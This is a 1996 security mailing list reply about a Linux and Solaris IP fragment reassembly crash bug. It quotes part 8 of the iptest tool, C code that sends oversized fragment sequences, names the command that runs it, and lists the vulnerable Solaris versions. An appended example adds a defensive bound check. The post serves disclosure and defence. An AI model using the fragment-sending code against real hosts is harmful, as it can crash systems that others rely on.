Date: Tue, 22 Oct 1996 23:35:12 +1000 (EST)
From: Darren Reed <avalon@coombs.anu.edu.au>
To: lutz@muc.de (Lutz Albers)
Cc: security@freebsd.org
Subject: Re: [bugtraq] Serious Linux Security Bug
Message-ID: <199610221338.GAA28820@freefall.freebsd.org>
In-Reply-To: <v03007802ae925cb8a72c@[192.168.42.51]> from "Lutz Albers" at Oct 22, 96 01:15:53 pm
Solaris2 was, I believe, vulnerable to this bug too.
From the "Crashable" file for iptest:
Solaris 2.4 - upto and including 101945-34, > 34 ?
Solaris 2.5 - 11/95
For those with it handy, "iptest -1 -p 8", but I built in some random
lossage which may stop it triggering the bug. I think if the lossage is
taken out, some systems will try to reassemble it all into a buffer which
(of course) is at max. 64k in size. However, it doesn't try to send an
ICMP packet; the following segment of code is what triggers it:
    if (!ptest || (ptest == 8)) {
        struct timeval tv;

        /* seed the random "lossage" that decides which fragments get skipped */
        gettimeofday(&tv, NULL);
        srand(tv.tv_sec ^ getpid() ^ tv.tv_usec);
        /*
         * Part8: 63k packet + 1k fragment at offset 0x1ffe
         */
        ip->ip_off = IP_MF;
        u->uh_dport = htons(9);
        ip->ip_id = htons(id++);
        printf("1.8. 63k packet + 1k fragment at offset 0x1ffe\n");

        /* first fragment: 768 bytes of data behind the IP and UDP headers */
        ip->ip_len = 768 + 20 + 8;
        if ((rand() & 0x1f) != 0) {
            (void) send_ip(nfd, mtu, ip, gwip, 1);
            printf("%d\r", i);
        } else
            printf("skip 0\n");

        /* middle fragments: 768 bytes each from offset 512 upward, MF set */
        ip->ip_len = MIN(768 + 20, mtu - 68);
        i = 512;
        for (; i < (63 * 1024 + 768); i += 768) {
            ip->ip_off = IP_MF | (i >> 3);
            if ((rand() & 0x1f) != 0) {
                (void) send_ip(nfd, mtu, ip, gwip, 1);
                printf("%d\r", i);
            } else
                printf("skip %d\n", i);
            fflush(stdout);
            PAUSE();
        }

        /* last fragment: 896 bytes at the offset the loop ended on */
        ip->ip_len = 896 + 20;
        ip->ip_off = IP_MF | (i >> 3);
        if ((rand() & 0x1f) != 0) {
            (void) send_ip(nfd, mtu, ip, gwip, 1);
            printf("%d\r", i);
        } else
            printf("skip\n");
        putchar('\n');
        fflush(stdout);
    }
Doesn't work against any system using BSD-based IP networking code.
Darren
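The reassembly bound that this test probes, as an added example written for this page (not code from Darren's message or from iptest): a check that drops any fragment whose offset*8 plus payload plus header cannot fit the 16-bit IP total length, and a replay of the part 8 offsets from the quoted loop showing where such a check fires. Assumed: 20-byte IP headers with no options, and an MTU large enough that ip_len stays 768+20 as in the quoted code.

```c
#include <stdbool.h>
#include <stdint.h>

/* IPv4 header constants as laid out in RFC 791 (names match <netinet/ip.h>). */
#define IP_MF        0x2000u  /* "more fragments" flag */
#define IP_OFFMASK   0x1fffu  /* 13-bit fragment offset, in 8-byte units */
#define IP_MAXPACKET 65535u   /* largest value the 16-bit total-length field holds */
#define IP_HDRLEN    20u      /* assumed here: no IP options on any fragment */

/* One past the last data byte this fragment would occupy in the reassembled
 * datagram; ip_off and ip_len are the header fields in host byte order. */
uint32_t frag_end(uint16_t ip_off, uint16_t ip_len)
{
    uint32_t start = (uint32_t)(ip_off & IP_OFFMASK) * 8u;
    uint32_t data  = ip_len > IP_HDRLEN ? ip_len - IP_HDRLEN : 0u;
    return start + data;
}

/*
 * Bound check a reassembler must run before it allocates or copies anything:
 * offset*8 + data + header has to fit in the 16-bit total length.  A 13-bit
 * offset alone reaches 65528 bytes, so a late fragment carrying an ordinary
 * payload overflows a fixed 64k reassembly buffer unless it is dropped here.
 */
bool frag_accept(uint16_t ip_off, uint16_t ip_len)
{
    return frag_end(ip_off, ip_len) + IP_HDRLEN <= IP_MAXPACKET;
}

/*
 * Replay the offsets iptest part 8 emits (first fragment carrying 768+8 data
 * bytes, then 768-byte fragments from offset 512 upward, MF set throughout,
 * assuming an MTU large enough that ip_len stays 768+20) and return the byte
 * offset of the first fragment the check drops.  Only numbers are fed to the
 * check; nothing is put on the wire.
 */
uint32_t iptest_part8_first_rejected_offset(void)
{
    if (!frag_accept(IP_MF, 768u + 20u + 8u))
        return 0u;
    for (uint32_t i = 512u; i < 63u * 1024u + 768u; i += 768u)
        if (!frag_accept((uint16_t)(IP_MF | (i >> 3)), 768u + 20u))
            return i;
    return UINT32_MAX;  /* every fragment fit: not the case for this sequence */
}
```

With these assumptions the first fragment of the quoted sequence that the check drops is the one at byte offset 65024; every fragment before it fits under 65535.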